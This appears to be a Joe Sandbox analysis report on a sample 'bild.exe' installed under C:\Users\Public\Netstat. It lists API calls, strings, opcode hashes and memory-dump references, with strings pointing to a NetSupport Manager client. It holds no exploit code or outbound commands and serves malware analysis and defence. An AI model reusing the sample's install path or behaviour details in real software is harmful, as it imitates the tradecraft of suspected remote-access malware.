                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                  • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                  • API String ID: 806825551-1858614750
                                                                                  • Opcode ID: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                  • Instruction ID: bd5304e3d9974d7ab46afc427c644d654ac0d4b62daaa3d8a48381b774377c4d
                                                                                  • Opcode Fuzzy Hash: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                  • Instruction Fuzzy Hash: 4B214676A142491BD701CF309D80BBFFFBA9F8B249F080578D852DB145E626D914C391
                                                                                  APIs
                                                                                    • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                    • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                  • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
                                                                                  • ResetEvent.KERNEL32(0000024C), ref: 11144269
                                                                                  • SetEvent.KERNEL32(0000024C), ref: 1114427F
                                                                                  • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114428E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                  • String ID: MiniDump
                                                                                  • API String ID: 1494854734-2840755058
                                                                                  • Opcode ID: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                  • Instruction ID: 829689d5ebdc208bf7b78735a50f5ce9a06f611da5f38dced1c13c8e9b13f18e
                                                                                  • Opcode Fuzzy Hash: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                  • Instruction Fuzzy Hash: 4F113875E5422677E300DFF99C81F9AF768AB44B28F200230EA24D75C4EB71A504C7B1
                                                                                  APIs
                                                                                  • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11146DCF
                                                                                  • wsprintfA.USER32 ref: 11146E06
                                                                                    • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                    • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                    • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                    • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                  • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                  • API String ID: 1985783259-2296142801
                                                                                  • Opcode ID: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                  • Instruction ID: b1a6c5171231f01418375ac6f2de6c12625a8d09d3611db16d7d0d369645f93a
                                                                                  • Opcode Fuzzy Hash: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                  • Instruction Fuzzy Hash: FA11A5FAE00128ABC720DB65ED81FAAF77C9B4461DF000565EB19B6141EA35AA05C7A8
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 1110F439
                                                                                    • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                    • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                    • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                  • wsprintfA.USER32 ref: 1110F454
                                                                                    • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                    • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                    • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                    • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                  • _memset.LIBCMT ref: 1110F477
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                  • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                  • API String ID: 3234921582-2664294811
                                                                                  • Opcode ID: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                  • Instruction ID: e8e28b36a5a63397ef775e95fa380a20e388029766e4784519104262db02a7f0
                                                                                  • Opcode Fuzzy Hash: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                  • Instruction Fuzzy Hash: 1CF0F6B5E0012863C720AFA5AC06FEFF37C9F91658F440169EE04A7241EA71BA11C7E9
                                                                                  APIs
                                                                                    • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75A78400), ref: 111450D0
                                                                                    • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                    • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                    • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                  • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
                                                                                  • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
                                                                                  • FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                  • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                  • API String ID: 1108920153-1959555903
                                                                                  • Opcode ID: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                  • Instruction ID: 699a5c6b52ff0bb6954823876d42b720b76b3255f49526743c1f98bd9e848574
                                                                                  • Opcode Fuzzy Hash: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                  • Instruction Fuzzy Hash: 67F0A03A70022877E21416BAAC08F9ABB5A8BC8A75F140230F928D69C0EB51C90086B5
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 11031926
                                                                                    • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                    • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                    • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                    • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                  • String ID: %s%s.bin$878411$clientinv.cpp$m_pDoInv == NULL
                                                                                  • API String ID: 4180936305-973242369
                                                                                  • Opcode ID: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                  • Instruction ID: 64da4217f7417b153db366359b1c36bd372b32cb55e7c28d29c46c6ec3487e21
                                                                                  • Opcode Fuzzy Hash: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                  • Instruction Fuzzy Hash: 5421A1B9E04709AFD710CF65DC81BAAB7F4FB88718F40453EE86597680EB35A9008B65
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(11144D48,00000000,?,11144D48,00000000), ref: 1114468C
                                                                                  • __strdup.LIBCMT ref: 111446A7
                                                                                    • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                    • Part of subcall function 11144670: _free.LIBCMT ref: 111446CE
                                                                                  • _free.LIBCMT ref: 111446DC
                                                                                    • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                    • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                  • CreateDirectoryA.KERNEL32(11144D48,00000000,?,?,?,11144D48,00000000), ref: 111446E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                  • String ID:
                                                                                  • API String ID: 398584587-0
                                                                                  • Opcode ID: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                  • Instruction ID: 9245e394badc27c9d68c775c1ae1103ae8f1f8453310ecf51c29309078bed6c3
                                                                                  • Opcode Fuzzy Hash: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                  • Instruction Fuzzy Hash: F4016D7A7441065BF301197D7C057ABBB8C8F82AADF144032F89DC3D80F752E41682A1
                                                                                  APIs
                                                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EDA2
                                                                                    • Part of subcall function 11160824: _setlocale.LIBCMT ref: 11160836
                                                                                  • _free.LIBCMT ref: 1100EDB4
                                                                                    • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                    • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                  • _free.LIBCMT ref: 1100EDC7
                                                                                  • _free.LIBCMT ref: 1100EDDA
                                                                                  • _free.LIBCMT ref: 1100EDED
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                  • String ID:
                                                                                  • API String ID: 3515823920-0
                                                                                  • Opcode ID: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                  • Instruction ID: 71b49ece8787e94f553dd036e4ff5c8d0ec16ff98238e97fea1187b5179b4c62
                                                                                  • Opcode Fuzzy Hash: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                  • Instruction Fuzzy Hash: E61190B1D046109BD620DF599C40A5BF7FCEB44754F144A2AE456D3780E672F900CB91
                                                                                  APIs
                                                                                    • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                    • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                    • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                  • wsprintfA.USER32 ref: 1114593E
                                                                                  • wsprintfA.USER32 ref: 11145954
                                                                                    • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75A78400,?), ref: 111432C7
                                                                                    • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                    • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                  • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                  • API String ID: 3779116287-2600120591
                                                                                  • Opcode ID: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                  • Instruction ID: 1f9a4f0ce9ce2038842d239495dc50e58c380b2d1dc072d0c6c391bd72002940
                                                                                  • Opcode Fuzzy Hash: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                  • Instruction Fuzzy Hash: 9C01B1B990521D66CB109BB0AC41FEAF77C9B1470DF100199EC1996940EE21BA548BA4
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75A78400,?), ref: 111432C7
                                                                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile$CloseHandle
                                                                                  • String ID: "
                                                                                  • API String ID: 1443461169-123907689
                                                                                  • Opcode ID: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
